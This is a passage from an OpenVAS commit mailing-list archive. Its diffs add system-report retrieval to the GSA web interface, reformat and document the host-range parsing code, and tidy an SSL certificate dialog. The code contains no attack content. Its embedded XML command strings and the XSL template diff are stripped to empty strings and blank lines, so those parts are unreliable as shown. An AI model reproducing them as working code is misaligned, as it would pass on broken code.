available. " + "Diagnostics: Failure to connect to manager daemon.", + "/omp?cmd=get_status"); + + xml = g_string_new (""); + g_string_append_printf (xml, "%s", + duration ? duration : "86400"); + + /* Get the system reports. */ + + if (openvas_server_sendf (&session, + "") + == -1) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the system reports. " + "The current list of system reports is not available. " + "Diagnostics: Failure to send command to manager daemon.", + "/omp?cmd=get_status"); + } + + entity = NULL; + if (read_entity_and_string (&session, &entity, &xml)) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the system reports. " + "The current list of system reports is not available. " + "Diagnostics: Failure to receive response from manager daemon.", + "/omp?cmd=get_status"); + } + free_entity (entity); + + /* Cleanup, and return transformed XML. */ + + g_string_append (xml, ""); + openvas_server_close (socket, session); + return xsl_transform_omp (credentials, g_string_free (xml, FALSE)); +} + +/** + * @brief Return system report image. + * + * @param[in] credentials Credentials of user issuing the action. + * @param[in] url URL of report image. + * @param[in] duration Duration of report, in seconds. + * @param[out] content_type Content type return. + * @param[out] content_disposition Content dispositions return. + * @param[out] content_length Content length return. + * + * @return Image, or NULL. + */ +char * +get_system_report_omp (credentials_t *credentials, const char *url, + const char *duration, char **content_type, + char **content_disposition, gsize *content_length) +{ + entity_t entity; + entity_t report_entity; + gnutls_session_t session; + int socket; + char name[501]; + + *content_length = 0; + + if (url == NULL) + return NULL; + + /* fan/report.png */ + if (sscanf (url, "%500[^ /]./report.png", name) == 1) + { + if (manager_connect (credentials, &socket, &session)) + return NULL; + + if (openvas_server_sendf (&session, + "", + name, + duration ? duration : "86400") + == -1) + { + openvas_server_close (socket, session); + return NULL; + } + + entity = NULL; + if (read_entity (&session, &entity)) + { + openvas_server_close (socket, session); + return NULL; + } + + report_entity = entity_child (entity, "system_report"); + if (report_entity == NULL) + { + free_entity (entity); + openvas_server_close (socket, session); + return NULL; + } + + report_entity = entity_child (report_entity, "report"); + if (report_entity == NULL) + { + free_entity (entity); + openvas_server_close (socket, session); + return NULL; + } + else + { + char *content_64 = entity_text (report_entity); + char *content = NULL; + + if (content_64 && strlen (content_64)) + { + content = (char *) g_base64_decode (content_64, + content_length); + +#if 1 + *content_type = g_strdup ("image/png"); + //*content_disposition = g_strdup_printf ("attachment; filename=\"xxx.png\""); +#else + g_free (content); + content = g_strdup ("helo"); +#endif + } + + free_entity (entity); + openvas_server_close (socket, session); + return content; + } + } + + return NULL; +} + /* Manager communication. */ Modified: trunk/gsa/src/gsad_omp.h =================================================================== --- trunk/gsa/src/gsad_omp.h 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/src/gsad_omp.h 2010-01-07 21:11:51 UTC (rev 6342) @@ -108,6 +108,10 @@ char * delete_config_omp (credentials_t *, const char *); char * export_config_omp (credentials_t *, const char *, char **, char **, gsize *); +char * get_system_reports_omp (credentials_t *, const char *); +char * get_system_report_omp (credentials_t *, const char *, const char *, char **, + char **, gsize *); + gboolean is_omp_authenticated (gchar *, gchar *); char * get_nvt_details_omp (credentials_t *, const char *); Modified: trunk/gsa/src/html/header.m4 =================================================================== --- trunk/gsa/src/html/header.m4 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/src/html/header.m4 2010-01-07 21:11:51 UTC (rev 6342) @@ -39,6 +39,7 @@
          • Configuration Modified: trunk/gsa/src/html/src/gsad.xsl =================================================================== --- trunk/gsa/src/html/src/gsad.xsl 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/src/html/src/gsad.xsl 2010-01-07 21:11:51 UTC (rev 6342) @@ -97,6 +97,7 @@
          • Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-07 20:57:23 UTC (rev 6341) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-07 21:11:51 UTC (rev 6342) @@ -4006,6 +4006,102 @@ + + + + + +

            + + + + + + + +             + + + +
            +
            +
            +
            Performance + + + +
            +
            + + + + + +
            + Reports span the last: + + + + hour + + + hour + + + | + + + day + + + day + + + | + + + week + + + week + + + | + + + month + + + month + + + | + + + year + + + year + + +
            + + +
            +
            +
            +             + + + + + + + + + + From scm-commit at wald.intevation.org Fri Jan 8 09:03:42 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 09:03:42 +0100 (CET) Subject: [Openvas-commits] r6343 - in trunk/openvas-libraries: . hg Message-ID: <20100108080342.63DA0861F2CB@pyrosoma.intevation.org> Author: felix Date: 2010-01-08 09:03:40 +0100 (Fri, 08 Jan 2010) New Revision: 6343 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/hg/hg_add_hosts.c trunk/openvas-libraries/hg/hg_add_hosts.h trunk/openvas-libraries/hg/hg_debug.c trunk/openvas-libraries/hg/hg_filter.c trunk/openvas-libraries/hg/hg_filter.h trunk/openvas-libraries/hg/hg_subnet.h Log: * hg/hg_add_hosts.c (getaddrfamily, real_ip, range, hg_add_host) (hg_add_comma_delimited_hosts, hg_add_ipv6hos_with_options): Reformatting, doc and comments. (real_ip) Added TODO. This function should at least be renamed into contains_three_dots or the like. Added todo about missing documentation of valid input strings to the whole host resolution mechanisms. * hg/hg_add_hosts.h, hg_debug.c, hg_filter.c, hg_filter.h, hg_subnet.h: Reformatting, doc and comments. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/ChangeLog 2010-01-08 08:03:40 UTC (rev 6343) @@ -1,3 +1,16 @@ +2010-01-08 Felix Wolfsteller + + * hg/hg_add_hosts.c (getaddrfamily, real_ip, range, hg_add_host) + (hg_add_comma_delimited_hosts, hg_add_ipv6hos_with_options): + Reformatting, doc and comments. + (real_ip) Added TODO. This function should at least be renamed into + contains_three_dots or the like. + Added todo about missing documentation of valid input strings to the + whole host resolution mechanisms. + + * hg/hg_add_hosts.h, hg_debug.c, hg_filter.c, hg_filter.h, hg_subnet.h: + Reformatting, doc and comments. + 2010-01-07 Felix Wolfsteller * hg/hg_utils.c (hg_resolv): Added TODO about incomplete resolution in Modified: trunk/openvas-libraries/hg/hg_add_hosts.c =================================================================== --- trunk/openvas-libraries/hg/hg_add_hosts.c 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/hg/hg_add_hosts.c 2010-01-08 08:03:40 UTC (rev 6343) @@ -29,14 +29,22 @@ #include "hg_filter.h" #include "hg_add_hosts.h" #include "hg_subnet.h" -/* - * Add a host of the form + +/** + * @file + * Functions to add hosts to a hg_globals host list. * - * 'hostname' or 'xx.xx.xx.xx' or 'hostname/netmask' + * Possible input values for host/hostname: + * + * 'hostname' or 'xx.xx.xx.xx' or 'hostname/netmask' * or 'xx.xx.xx.xx/netmask' * or '[xx|xx-xx].[xx|xx-xx].[xx|xx-xx].[xx|xx-xx]' (by Alex Butcher, Articon-Integralis AG) - * */ +/** @TODO Document what kind of input for ipv6 adresses is acceppted, move + * description of valid "hostnames" to a better place (this is really + * interesting for a user), document how to list multiple hosts (space, + * comma, semicolon- separated?). + */ #define OCTETRANGE "%3d%*1[-]%3d" #define OCTET "%3d" @@ -45,10 +53,10 @@ #define REMINDER "%s" /** - * @param[out] family + * @param[out] family (AF_INET6 for ipv6, AF_INET for ipv4, -1 for invalid) * * @return 0 if (numeric) ip is a valid ipv4 or ipv6 address and set family to - * appropriate value, else return -1. + * appropriate value, else return -1 and set family to -1. */ static int getaddrfamily (char *ip, int *family) @@ -56,34 +64,45 @@ struct in_addr inaddr; struct in6_addr in6addr; - if(inet_pton(AF_INET6, ip, &in6addr) == 1) - { - *family = AF_INET6; - return 0; - } - else if(inet_aton(ip,&inaddr)) - { - *family = AF_INET; - return 0; - } + if (inet_pton (AF_INET6, ip, &in6addr) == 1) + { + *family = AF_INET6; + return 0; + } + else if (inet_aton (ip,&inaddr)) + { + *family = AF_INET; + return 0; + } *family = -1; return -1; } +/** @TODO real_ip should not be used as a check whether a string describes an + * ip or being improved. In current code, bogus.bugs.openvas.org is + * considered as "real" ip. */ +/** + * @brief Counts numbers of dots ('.') in string s, returns 1 if 3 dots were + * @brief found, 0 otherwise. + * + * @param s Input string. + * + * @return 1 if 3 dots ('.') in \ref s present, 0 otherwise. + */ static int -real_ip(char * s) +real_ip (char * s) { - int i; - int n = 0; - for(i=0;s[i];i++) - { - if(s[i] == '.') n ++; - } - - if(n == 3) - return 1; - else - return 0; + int i; + int n = 0; + for (i = 0; s[i]; i++) + { + if (s[i] == '.') n++; + } + + if (n == 3) + return 1; + else + return 0; } static int @@ -127,7 +146,8 @@ return 0; } -static int netmask_to_cidr_netmask(struct in_addr nm) +static int +netmask_to_cidr_netmask(struct in_addr nm) { int ret = 32; @@ -140,6 +160,12 @@ return ret; } +/** + * @brief Adds host(s) to the hg_globals hostslist. + * + * @param[in,out] globals Pointer to hg_globals struct to add hosts to. + * @param[in] hostname String describing host(s) to add. + */ int hg_add_host (struct hg_globals * globals, char* hostname) { @@ -165,29 +191,30 @@ *comp1 = *comp2 = *comp3 = *comp4 = '\0'; - t = strchr(hostname, '-'); - if(t != NULL) + t = strchr (hostname, '-'); + if (t != NULL) { struct in_addr ip; t[0] = '\0'; - if((inet_aton(hostname, &ip) == 0) || !real_ip(hostname)) - { - t[0] = '-'; - goto next; - } + // If string describing a host could not be transformed to an in_addr + // or does not contain three dots. + if ((inet_aton (hostname, &ip) == 0) || !real_ip (hostname)) + { + t[0] = '-'; + goto next; + } - if(real_ip(hostname) && - real_ip(&(t[1]))) + if (real_ip (hostname) && real_ip (&(t[1]))) { struct in_addr start, end; struct in6_addr start6, end6; - hg_resolv(hostname, &start6, AF_INET); - hg_resolv(&(t[1]), &end6, AF_INET); + hg_resolv (hostname, &start6, AF_INET); + hg_resolv (&(t[1]), &end6, AF_INET); start.s_addr = start6.s6_addr32[3]; end.s_addr = end6.s6_addr32[3]; - if ( globals->flags & HG_DISTRIBUTE ) + if (globals->flags & HG_DISTRIBUTE) { int jump; unsigned long diff; @@ -198,22 +225,21 @@ else if ( diff > 128 ) jump = 10; else jump = 1; - - - for ( j = 0 ; j < jump ; j ++ ) + for (j = 0 ; j < jump ; j ++) { - for ( i = j ; i <= diff ; i += jump ) + for (i = j ; i <= diff ; i += jump) { struct in_addr ia; - ia.s_addr = htonl(ntohl(start.s_addr) + i); - if ( ntohl(ia.s_addr) > ntohl(end.s_addr) )break; + ia.s_addr = htonl (ntohl (start.s_addr) + i); + if (ntohl(ia.s_addr) > ntohl(end.s_addr)) + break; - hg_add_host_with_options(globals, inet_ntoa(ia), ia, 1, 32, 1, &ia); + hg_add_host_with_options (globals, inet_ntoa (ia), ia, 1, 32, 1, &ia); } } } else - hg_add_host_with_options(globals, inet_ntoa(start), start, 1, 32, 1, &end); + hg_add_host_with_options (globals, inet_ntoa (start), start, 1, 32, 1, &end); return 0; } t[0] = '-'; @@ -221,53 +247,54 @@ next: - reminder = malloc(strlen(hostname)); + reminder = malloc (strlen(hostname)); - if((hostname[0] == '\'') && + // Hostname wrapped by singe quotes ('')? + if ((hostname[0] == '\'') && (hostname[strlen(hostname) - 1] == '\'')) - { - unquote++; - goto noranges; - } + { + unquote++; + goto noranges; + } for (t = hostname; *t != '\0'; t ++) - if (! isdigit(*t) && *t != '-' && *t != '.') + if (! isdigit (*t) && *t != '-' && *t != '.') break; if (*t == '\0') - convs=sscanf(hostname, COMP DOT COMP DOT COMP DOT COMP REMINDER, - comp1, comp2, comp3, comp4, reminder); + convs = sscanf (hostname, COMP DOT COMP DOT COMP DOT COMP REMINDER, + comp1, comp2, comp3, comp4, reminder); else convs = 0; - free(reminder); - if (convs != 4) goto noranges; /* there are definitely no ranges here, so + free (reminder); + if (convs != 4) goto noranges; /* There are definitely no ranges here, so skip all this */ - /* try to convert components as OCTETRANGE (xxx-xxx) */ - if(range(comp1, &o1first, &o1last) || + /* Try to convert components as OCTETRANGE (xxx-xxx). */ + if (range(comp1, &o1first, &o1last) || range(comp2, &o2first, &o2last) || range(comp3, &o3first, &o3last) || range(comp4, &o4first, &o4last)) goto noranges; - /* generate and add the range */ - for(o1=o1first; o1<=o1last; o1++) + /* Generate and add the range. */ + for (o1 = o1first; o1 <= o1last; o1++) { - for(o2=o2first; o2<=o2last; o2++) + for (o2 = o2first; o2 <= o2last; o2++) { - for(o3=o3first; o3<=o3last; o3++) + for (o3 = o3first; o3 <= o3last; o3++) { - for(o4=o4first; o4<=o4last; o4++) + for (o4 = o4first; o4 <= o4last; o4++) { - snprintf(rangehost,17,"%d.%d.%d.%d",o1,o2,o3,o4); - hg_resolv(rangehost, &ip6, AF_INET); + snprintf (rangehost, 17, "%d.%d.%d.%d", o1, o2, o3, o4); + hg_resolv (rangehost, &ip6, AF_INET); ip.s_addr = ip6.s6_addr32[3]; - if(ip.s_addr != INADDR_NONE) - { - hg_add_host_with_options(globals, rangehost, ip, 0, 32,0,NULL); - } + if (ip.s_addr != INADDR_NONE) + { + hg_add_host_with_options (globals, rangehost, ip, 0, 32, 0, NULL); + } } } } @@ -275,65 +302,65 @@ return 0; noranges: - if(unquote) - { - copy = malloc(strlen(hostname) - 1); - strncpy(copy, &(hostname[1]), strlen(&(hostname[1])) - 1); - } + if (unquote) + { + copy = malloc (strlen (hostname) - 1); + strncpy (copy, &(hostname[1]), strlen(&(hostname[1])) - 1); + } else - { - copy = malloc(strlen(hostname)+1); - strncpy(copy, hostname, strlen(hostname)+1); - } + { + copy = malloc (strlen (hostname) + 1); + strncpy (copy, hostname, strlen (hostname) + 1); + } hostname = copy; - t = strchr(hostname, '/'); - if(t) - { - t[0] = '\0'; - if((atoi(t+1) > 32) && - inet_aton(t+1, &nm)) + // Checks for slash, which might indicate cidr notation + t = strchr (hostname, '/'); + if (t) { - cidr_netmask = netmask_to_cidr_netmask(nm); + t[0] = '\0'; + if ((atoi(t+1) > 32) && inet_aton (t+1, &nm)) + { + cidr_netmask = netmask_to_cidr_netmask (nm); + } + else + cidr_netmask = atoi (t+1); + if ((cidr_netmask < 1) || (cidr_netmask > 32)) + cidr_netmask = 32; } - else - cidr_netmask = atoi(t+1); - if((cidr_netmask < 1) || (cidr_netmask > 32)) - cidr_netmask = 32; - } ip.s_addr = INADDR_NONE; q = strchr (hostname, '['); if (q != NULL) - { - t = strchr (q, ']'); + { + t = strchr (q, ']'); - if (t != NULL) + if (t != NULL) + { + t[0] = '\0'; + hg_resolv (&q [1], &ip6, AF_INET6); + ip.s_addr = ip6.s6_addr32[3]; + q[0] = '\0'; + } + } + if (ip.s_addr == INADDR_NONE) { - t[0] = '\0'; - hg_resolv (&q [1], &ip6, AF_INET6); + hg_resolv (hostname, &ip6, AF_INET6); ip.s_addr = ip6.s6_addr32[3]; - q[0] = '\0'; } - } - if (ip.s_addr == INADDR_NONE) + if (!IN6_ARE_ADDR_EQUAL (&ip6, &in6addr_any) && IN6_IS_ADDR_V4MAPPED (&ip6)) { - hg_resolv (hostname, &ip6, AF_INET6); - ip.s_addr = ip6.s6_addr32[3]; - } - if( !IN6_ARE_ADDR_EQUAL(&ip6, &in6addr_any) && IN6_IS_ADDR_V4MAPPED(&ip6)) - { - if(cidr_netmask == 32) + if (cidr_netmask == 32) { - hg_add_host_with_options(globals, hostname, ip, 0, cidr_netmask,0,NULL); + hg_add_host_with_options (globals, hostname, ip, 0, cidr_netmask, 0, NULL); } else { - struct in_addr first = cidr_get_first_ip(ip, cidr_netmask); - struct in_addr last = cidr_get_last_ip(ip, cidr_netmask); + struct in_addr first = cidr_get_first_ip (ip, cidr_netmask); + struct in_addr last = cidr_get_last_ip (ip, cidr_netmask); - if( (globals->flags & HG_DISTRIBUTE) != 0 && cidr_netmask <= 29 ) + if ((globals->flags & HG_DISTRIBUTE) != 0 && cidr_netmask <= 29) { struct in_addr c_end; struct in_addr c_start; @@ -347,38 +374,39 @@ c_start = first; c_end = cidr_get_last_ip(c_start, cidr_netmask + addition); - for(;;) + for (;;) { int dobreak = 0; + if (ntohl (c_end.s_addr) >= ntohl (last.s_addr)) + dobreak++; + hg_get_name_from_ip (&c_start6, hostname, sizeof (hostname)); - if(ntohl(c_end.s_addr) >= ntohl(last.s_addr)) dobreak++; - hg_get_name_from_ip(&c_start6, hostname, sizeof(hostname)); - c_start.s_addr = c_start6.s6_addr32[3]; - hg_add_host_with_options(globals, strdup(hostname), + hg_add_host_with_options (globals, strdup(hostname), c_start, 1, 32, 1, &c_end); - c_start.s_addr = htonl(ntohl(c_end.s_addr) + 2); - c_end = cidr_get_last_ip(c_start, cidr_netmask + addition); - c_start.s_addr = htonl(ntohl(c_start.s_addr) - 1); + c_start.s_addr = htonl (ntohl(c_end.s_addr) + 2); + c_end = cidr_get_last_ip (c_start, cidr_netmask + addition); + c_start.s_addr = htonl (ntohl (c_start.s_addr) - 1); - if(dobreak) break; + if (dobreak) break; } } - else hg_add_host_with_options(globals, hostname, first, 1,32,1,&last); + else hg_add_host_with_options (globals, hostname, first, 1, 32, 1, &last); } } - else if(!IN6_ARE_ADDR_EQUAL(&ip6, &in6addr_any)) - { - hg_add_ipv6host_with_options(globals, hostname, &ip6, 0, 128, 0, &ip6); - } + else if (!IN6_ARE_ADDR_EQUAL (&ip6, &in6addr_any)) + { + hg_add_ipv6host_with_options (globals, hostname, &ip6, 0, 128, 0, &ip6); + } else - { - free(copy); - return -1; - } - free(copy); + { + free (copy); + return -1; + } + + free (copy); return 0; } @@ -409,17 +437,16 @@ } // Skip (leading) spaces - while ((*p == ' ')&&(p!='\0')) + while ((*p == ' ') && (p!='\0')) p++; - v = strchr(p+1, ','); - if ( v == NULL ) + v = strchr (p+1, ','); + if (v == NULL) v = strchr(p+1, ';'); - if( v != NULL ) + if (v != NULL) v[0] = '\0'; - len = strlen(p); while (p[len-1]==' ') { @@ -427,29 +454,30 @@ len --; } - /* Check whether ip is of type ipv6. Right now we support only ipv6 addresses without any range or netmask */ - if(!getaddrfamily(p, &family)) + /* Check whether ip is of type ipv6. Right now we support only ipv6 + * addresses without any range or netmask. */ + if (!getaddrfamily(p, &family)) { if(family == AF_INET6) - { - inet_pton(AF_INET6, p, &ip6); - hg_add_ipv6host_with_options(globals, p, &ip6, 0, 128, 0, &ip6); - } + { + inet_pton(AF_INET6, p, &ip6); + hg_add_ipv6host_with_options (globals, p, &ip6, 0, 128, 0, &ip6); + } else - { - if(hg_add_host(globals, p) < 0) { - if ( v != NULL ) - globals->marker = v + 1; - else - globals->marker = NULL; - return -1; + if (hg_add_host (globals, p) < 0) + { + if ( v != NULL ) + globals->marker = v + 1; + else + globals->marker = NULL; + return -1; + } } - } } else { - if(hg_add_host(globals, p) < 0) + if (hg_add_host (globals, p) < 0) { if ( v != NULL ) globals->marker = v + 1; @@ -459,12 +487,10 @@ } } - - n ++; if (v != NULL) p = v+1; - else + else p = NULL; } @@ -482,26 +508,27 @@ int i; char local_hostname[1024]; - if (inet_ntop(AF_INET6, ip, local_hostname , sizeof(local_hostname))) - c_hostname = strdup(hostname); + if (inet_ntop (AF_INET6, ip, local_hostname, sizeof (local_hostname))) + c_hostname = strdup (hostname); for (i = 0; i < strlen (hostname); i++) c_hostname[i] = tolower (c_hostname[i]); host = globals->host_list; - while(host->next)host = host->next; - host->next = malloc(sizeof(struct hg_host)); - bzero(host->next, sizeof(struct hg_host)); + while (host->next) + host = host->next; + host->next = malloc (sizeof (struct hg_host)); + bzero (host->next, sizeof (struct hg_host)); host->hostname = c_hostname; - host->domain = hostname ? hg_name_to_domain(c_hostname):""; + host->domain = hostname ? hg_name_to_domain (c_hostname) : ""; host->cidr_netmask = netmask; host->tested = 0; host->alive = alive; /*host->addr = ip; convipv4toipv4mappedaddr(host->addr, &host->in6addr);*/ - memcpy(&host->in6addr, ip, sizeof(struct in6_addr)); - host->use_max = use_max?1:0; + memcpy (&host->in6addr, ip, sizeof (struct in6_addr)); + host->use_max = use_max ? 1 : 0; } void Modified: trunk/openvas-libraries/hg/hg_add_hosts.h =================================================================== --- trunk/openvas-libraries/hg/hg_add_hosts.h 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/hg/hg_add_hosts.h 2010-01-08 08:03:40 UTC (rev 6343) @@ -19,12 +19,14 @@ #ifndef HG_ADD_HOSTS_H__ #define HG_ADD_HOSTS_H__ -int hg_add_host(struct hg_globals *, char *); -int hg_add_comma_delimited_hosts(struct hg_globals *, int); -void hg_add_host_with_options(struct hg_globals *, char *, struct in_addr , - int, int,int, struct in_addr *); -void hg_add_ipv6host_with_options(struct hg_globals *, char *, struct in6_addr *, - int, int,int, struct in6_addr *); -void hg_add_domain(struct hg_globals *, char *); -void hg_add_subnet(struct hg_globals *, struct in_addr, int); +int hg_add_host (struct hg_globals *, char *); +int hg_add_comma_delimited_hosts (struct hg_globals *, int); +void hg_add_host_with_options (struct hg_globals *, char *, struct in_addr, + int, int,int, struct in_addr *); +void hg_add_ipv6host_with_options (struct hg_globals *, char *, + struct in6_addr *, int, int, int, + struct in6_addr *); +void hg_add_domain (struct hg_globals *, char *); +void hg_add_subnet (struct hg_globals *, struct in_addr, int); + #endif Modified: trunk/openvas-libraries/hg/hg_debug.c =================================================================== --- trunk/openvas-libraries/hg/hg_debug.c 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/hg/hg_debug.c 2010-01-08 08:03:40 UTC (rev 6343) @@ -22,15 +22,14 @@ #include "hosts_gatherer.h" void -hg_dump_hosts(hosts) - struct hg_host * hosts; +hg_dump_hosts (struct hg_host * hosts) { - while(hosts && hosts->next) - { - printf("\t[ %s ]\tT: %d\tA : %d\tN : %d\t(%s)\n", inet_ntoa(hosts->addr), - hosts->tested, hosts->alive, - hosts->cidr_netmask, - hosts->hostname); - hosts = hosts->next; - } + while (hosts && hosts->next) + { + printf ("\t[ %s ]\tT: %d\tA : %d\tN : %d\t(%s)\n", inet_ntoa (hosts->addr), + hosts->tested, hosts->alive, + hosts->cidr_netmask, + hosts->hostname); + hosts = hosts->next; + } } Modified: trunk/openvas-libraries/hg/hg_filter.c =================================================================== --- trunk/openvas-libraries/hg/hg_filter.c 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/hg/hg_filter.c 2010-01-08 08:03:40 UTC (rev 6343) @@ -27,15 +27,15 @@ * Returns 1 if the host must be filtered, that is, it must NOT be included in * the list. * Returns 0 if it must be included in the list. - * + * * @return 0 if host must be included, 1 host must not be included */ -int +int hg_filter_host (struct hg_globals* globals, char* hostname, struct in_addr addr) { #if DISABLED struct hg_host * list = globals->host_list; - + /* int i; @@ -48,7 +48,7 @@ for(i=0;inext) { if(list->use_max) @@ -75,7 +75,7 @@ /** * @brief Returns 1 if the subnet must NOT be tested - * + * * @return 1 if the subnet must not be tested. */ int @@ -83,7 +83,7 @@ { struct hg_host * list = globals->tested; struct in_addr subnet; - + while(list && list->next) { struct in_addr subnet_2; @@ -104,7 +104,7 @@ /** * @brief Returns 1 if the domain must NOT be tested - * + * * @return 1 if the domain must NOT be tested. */ int Modified: trunk/openvas-libraries/hg/hg_filter.h =================================================================== --- trunk/openvas-libraries/hg/hg_filter.h 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/hg/hg_filter.h 2010-01-08 08:03:40 UTC (rev 6343) @@ -19,7 +19,8 @@ #ifndef HG_FILTER_H__ #define HG_FILTER_H__ -int hg_filter_host(struct hg_globals *, char *, struct in_addr); -int hg_filter_subnet(struct hg_globals *, struct in_addr, int); -int hg_filter_domain(struct hg_globals *, char *); +int hg_filter_host (struct hg_globals *, char *, struct in_addr); +int hg_filter_subnet (struct hg_globals *, struct in_addr, int); +int hg_filter_domain (struct hg_globals *, char *); + #endif Modified: trunk/openvas-libraries/hg/hg_subnet.h =================================================================== --- trunk/openvas-libraries/hg/hg_subnet.h 2010-01-07 21:11:51 UTC (rev 6342) +++ trunk/openvas-libraries/hg/hg_subnet.h 2010-01-08 08:03:40 UTC (rev 6343) @@ -18,7 +18,9 @@ #ifndef HG_SUBNET_H__ #define HG_SUBNET_H__ -void hg_gather_subnet_hosts(struct hg_globals *, struct hg_host * ); -struct in_addr cidr_get_first_ip(struct in_addr, int); + +void hg_gather_subnet_hosts (struct hg_globals *, struct hg_host * ); +struct in_addr cidr_get_first_ip (struct in_addr, int); struct in_addr cidr_get_last_ip (struct in_addr, int); + #endif From scm-commit at wald.intevation.org Fri Jan 8 09:29:38 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 09:29:38 +0100 (CET) Subject: [Openvas-commits] r6344 - in trunk/openvas-client: . openvas Message-ID: <20100108082938.596C0865F498@pyrosoma.intevation.org> Author: felix Date: 2010-01-08 09:29:34 +0100 (Fri, 08 Jan 2010) New Revision: 6344 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/sslui.c Log: * openvas/sslui.c: Cosmetics. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2010-01-08 08:03:40 UTC (rev 6343) +++ trunk/openvas-client/ChangeLog 2010-01-08 08:29:34 UTC (rev 6344) @@ -1,3 +1,7 @@ +2010-01-08 Felix Wolfsteller + + * openvas/sslui.c: Cosmetics. + 2009-12-21 Felix Wolfsteller * configure.in: When gnutls is not found, place a hint that it was Modified: trunk/openvas-client/openvas/sslui.c =================================================================== --- trunk/openvas-client/openvas/sslui.c 2010-01-08 08:03:40 UTC (rev 6343) +++ trunk/openvas-client/openvas/sslui.c 2010-01-08 08:29:34 UTC (rev 6344) @@ -33,9 +33,7 @@ /*-------------------------------------------------------------------------*/ static void -sslui_paranoia_callback(w, ctrls) - GtkWidget * w; - struct arglist * ctrls; +sslui_paranoia_callback (GtkWidget * w, struct arglist * ctrls) { GSList * list = arg_get_value(ctrls, "LEVEL_RADIO"); int value; @@ -57,10 +55,8 @@ } } -static void -build_dialog(ctrls, prompt) - struct arglist * ctrls; - char * prompt; +static void +build_dialog (struct arglist * ctrls, char * prompt) { GtkWidget * w, * table, * ok; GdkPixbuf *pixbuf = NULL; @@ -75,56 +71,52 @@ pixbuf = gdk_pixbuf_new_from_xpm_data((const char **)lock_xpm); img = gtk_image_new_from_pixbuf(pixbuf); - gtk_window_set_title(GTK_WINDOW(w), _("SSL Setup")); gtk_container_border_width(GTK_CONTAINER(w), 5); arg_add_value(ctrls, "WINDOW", ARG_PTR, -1, w); - - + vbox = gtk_vbox_new(FALSE, 5); hbox = gtk_hbox_new(FALSE, 5); - - - + gtk_container_add(GTK_CONTAINER(w), hbox); gtk_widget_show(hbox); - + gtk_box_pack_start(GTK_BOX(hbox), vbox, FALSE, FALSE, 0); gtk_widget_show(vbox); - + gtk_box_pack_start(GTK_BOX(vbox), img, FALSE, FALSE, 0); gtk_widget_show(img); - + sep = gtk_vseparator_new(); gtk_box_pack_start(GTK_BOX(hbox), sep, FALSE, FALSE, 5); gtk_widget_show(sep); - + vbox = gtk_vbox_new(FALSE, 5); gtk_box_pack_start(GTK_BOX(hbox), vbox, FALSE, FALSE, 0); gtk_widget_show(vbox); - + box = gtk_hbox_new(FALSE, 5); gtk_box_pack_start(GTK_BOX(vbox), box, FALSE, FALSE, 10); gtk_widget_show(box); - + label = gtk_label_new(prompt); gtk_box_pack_start(GTK_BOX(box), label, FALSE, FALSE, 10); gtk_widget_show(label); - + table = gtk_table_new(3,1,TRUE); gtk_box_pack_start(GTK_BOX(vbox), table, FALSE, FALSE, 5); gtk_container_border_width(GTK_CONTAINER(table), 10); gtk_widget_show(table); - - + + first_button = gtk_radio_button_new_with_label( NULL, _("Display and remember the server certificate, do not care about the CA")); gtk_object_set_data(GTK_OBJECT(first_button), "level", (void*)1); gtk_table_attach_defaults(GTK_TABLE(table), first_button,0,1,0,1); - - + + /*TABLE*/ gtk_widget_show(first_button); button = gtk_radio_button_new_with_label( @@ -148,7 +140,7 @@ ok = gtk_button_new_with_label(_("OK")); g_signal_connect(GTK_OBJECT(ok), "clicked", - (GtkSignalFunc)sslui_paranoia_callback, + (GtkSignalFunc)sslui_paranoia_callback, (void*)ctrls); otable = gtk_table_new(1,2, TRUE); @@ -163,13 +155,10 @@ } - /*-------------------------------------------------------------------------*/ #endif /* GTK_UI */ - - /** * @brief Ask the level of paranoia the user wants to set. * @@ -219,10 +208,7 @@ static void -showcert_cb(w, ctrls, accept) - GtkWidget * w; - struct arglist * ctrls; - int accept; +showcert_cb (GtkWidget * w, struct arglist * ctrls, int accept) { gtk_widget_hide(arg_get_value(ctrls, "WINDOW")); gtk_widget_destroy(arg_get_value(ctrls, "WINDOW")); @@ -232,64 +218,61 @@ } -static void -showcert_accept_cb(w, ctrls) - GtkWidget* w; - struct arglist *ctrls; +static void +showcert_accept_cb (GtkWidget* w, struct arglist *ctrls) { showcert_cb(w,ctrls, 1); } static void -showcert_refuse_cb(w, ctrls) - GtkWidget* w; - struct arglist *ctrls; +showcert_refuse_cb (GtkWidget* w, struct arglist *ctrls) { - showcert_cb(w,ctrls, 0); + showcert_cb (w, ctrls, 0); } /** - * Displays certificate and asks whether to trust it or not. - * (Callbacks showcert_accept_cb and showcert_refuse_cb which ultimately call + * @brief Displays certificate and asks whether to trust it or not. + * + * (Callbacks showcert_accept_cb and showcert_refuse_cb which ultimately call * showcert_cb). - * + * * @param cert The certificate text. * @return Arglist with WINDOW and RESULT entry (RESULT is 1 if the certificate * was accepted). */ -static struct arglist * -sslui_showcert(char* cert) +static struct arglist * +sslui_showcert (char* cert) { - struct arglist * ctrls = emalloc(sizeof(*ctrls)); + struct arglist * 